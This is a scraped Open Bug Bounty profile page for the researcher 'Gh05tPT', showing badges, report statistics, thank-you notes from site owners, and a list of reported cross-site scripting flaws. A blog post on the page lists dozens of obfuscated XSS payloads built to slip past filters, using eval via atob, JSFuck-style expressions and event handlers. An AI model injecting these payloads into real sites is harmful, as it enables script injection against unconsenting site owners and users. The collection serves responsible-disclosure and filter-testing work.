Gh05tPT
Top Security Researcher of the Month
Top VIP Security Researcher of the Month | Security Researcher Profile
Security researcher Gh05tPT has already helped fix 5861 vulnerabilities.
Researcher reputation: 670
Real name:
#Gh05tPT #inurlBR #Ch3rn0bylH4ck3r5 #aCCESS
About me:
http://blog.inurl.com.br/
How to contact me:
https://twitter.com/Gh05tPT
[email protected]
http://blog.inurl.com.br/
https://facebook.com/podzemie4544
https://facebook.com/exchangesec/
Alternative Contacts:
http://blog.inurl.com.br/
Experience in Application Security
over 5 years
Award / Bug Bounty I prefer:
A thanks/profile recommendation will be really appreciated, but if you'd like:
paypal.me/Gh05tPT
# Bug Bounty ($$$)
# Hall Of Fame
# T-shirts, Sweats, Caps, Stickers, Keychains, etc
Halls of Fame:
https://www.pejadesign.com/chi-siamo/chi-siamo#manyThanks.
https://unite.un.org/content/hall-fame
Recommendations and Acknowledgements


Gh05tPT found a XSS vulnerability on our site which I was able to fix quite quickly. Thanks for your help. |

Thanks for the XSS report. We should be able to get the issue fixed next patch. |


Thanks for the details about the failure found on one of our sites. |


Thank you for your help, for the detail of XSS vulnerabilty. Much appreciate. |


Thanks for reporting XSS issue on my site. Clear report, helpful support. :) |


O Gh05tPT reportou uma vulnerabilidade em um sistema do órgão em que trabalho e nos ajudou a solucioná-la logo no primeiro contato. Muito obrigado. |


Was very easy to contact Gh05tPT and get the information needed to help fix the vulnerability found on our website. Wonderful security researcher to deal with and I'm glad that people like this exist to help make the internet a more secure and safe place. |


Gh05tPT has found an XSS vulnerability on one of our pages. He is very helpful and responded very quickly. I really appreciate it. Thank you very much. |


One more XSS bug discovered and patched thanks to Gh05tPT. Much appreciated! |


Dear, Thanks for participating in responsible disclosure program. The reports you submitted were extremely helpful to our team and provided us the details we needed to resolve the issues that you identified. We are deeply committed to provide a safe and secure experience to our users and are therefore grateful for your efforts to help us improve our services. Best Regards! |
Shows the first 10 recommendations. See all.
Honor Badges
Number of Secured Websites
![]() |
![]() |
![]() |
![]() |
10+ Websites
|
50+ Websites
|
500+ Websites
|
WEB SECURITY VETERAN
1000+ Websites
|
Advanced Security Research
![]() |
![]() |
![]() |
![]() |
WAF Bypasser
|
CSRF Master
30+ Reports
|
AppSec Logic Master
30+ Reports
|
Fastest Fix
Fix in 24 hours
|
Outstanding Achievements
![]() |
![]() |
![]() |
|
Secured OBB
|
OBB Advocate
|
Improved OBB
|
Commitment to Remediate and Patch
![]() |
![]() |
![]() |
|
Patch Master
55% Patched
|
Patch Guru
65% Patched
|
Patch Lord
75% Patched
|
Recommendations and Recognition
![]() |
![]() |
![]() |
|
REPUTABLE
10+ Recommends
|
FAMOUS
25+ Recommends
|
GLOBALLY TRUSTED
50+ Recommends
|
Distinguished Blog Author
![]() |
![]() |
![]() |
|
1 Post
|
3 Posts
|
5+ Posts
|
Research Statistics
Total reports: | 19451 |
Total reports on VIP sites: | 410 |
Total patched vulnerabilities: | 5861 |
Total vulnerabilities on Hold (Open Bug Bounty): | 3891 |
Recommendations received: | 44 |
Active since: | 05.04.2018 |
Top Security Researcher Awards: | ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Top VIP Security Researcher Awards: | ![]() ![]() |
04.04.2019 XSS alert() variants
<script>prompt(1)</script>
<script>confirm(1)</script>
<script>var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk='));</script>
<script>var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk='));</script>
<script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk=')); </script>
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script> <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
<script>'str1ng'.replace(/1/,alert)</script> <script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script> <script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/,function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
<script>eval('\\u'+'0061'+'lert(1)')</script> <script>throw~delete~typeof~prompt(1)</script> <script>delete[a=alert]/prompt a(1)</script> <script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script> <script>(()=>{return this})().alert(1)</script>
<script>new function(){new.target.constructor('alert(1)')();}</script> <script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script>
<link/rel=prefetch import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel="import" href="data:x,<script>alert(1)</script> <script>Array.from`1${alert}3${window}2`</script>
<script>!{x(){alert(1)}}.x()</script> <script>Array.from`${eval}alert\`1\``</script> <script>Array.from([1],alert)</script> <script>Promise.reject("1").then(null,alert)</script>
<svg </onload ="1> (_=alert,_(1)) "">
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<marquee loop=1 width=0 onfinish=alert(1)>
<p onbeforescriptexecute="alert(1)"><svg><script>\</p>
<img onerror=alert(1) src <u></u> <videogt;<source onerror=javascript:prompt(911)gt;
<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a>
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)">
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
<script>```${``[class extends[alert``]{}]}```</script> <script>[class extends[alert````]{}]</script>
<script>throw new class extends Function{}('alert(1)')``</script> <script>x=new class extends Function{}('alert(1)'); x=new x;</script> <script>new class extends alert(1){}</script>
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script> <script src=data:,\u006fnerror=\u0061lert(1)></script>
"><svg><script/xlink:href="data:,alert(1) <svg><script/xlink:href=data:,alert(1)></script> <frameset/onpageshow=alert(1)>
<div onactivate=alert('Xss') id=xss style=overflow:scroll>
<div onfocus=alert('xx') id=xss style=display:table>
Reported Vulnerabilities
All Submissions VIP SubmissionsFeatured Submissions
Domain | Reported | Status | Type |
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
04.12.2019
|
On Hold
|
Cross Site Scripting |
|
03.12.2019
|
On Hold
|
Improper Access Control |
|
03.12.2019
|
On Hold
|
Improper Access Control |
|
03.12.2019
|
On Hold
|
Improper Access Control |
|
03.12.2019
|
On Hold
|
Cross Site Scripting |
|
03.12.2019
|
On Hold
|
Cross Site Scripting |
Please login via Twitter to add a recommendation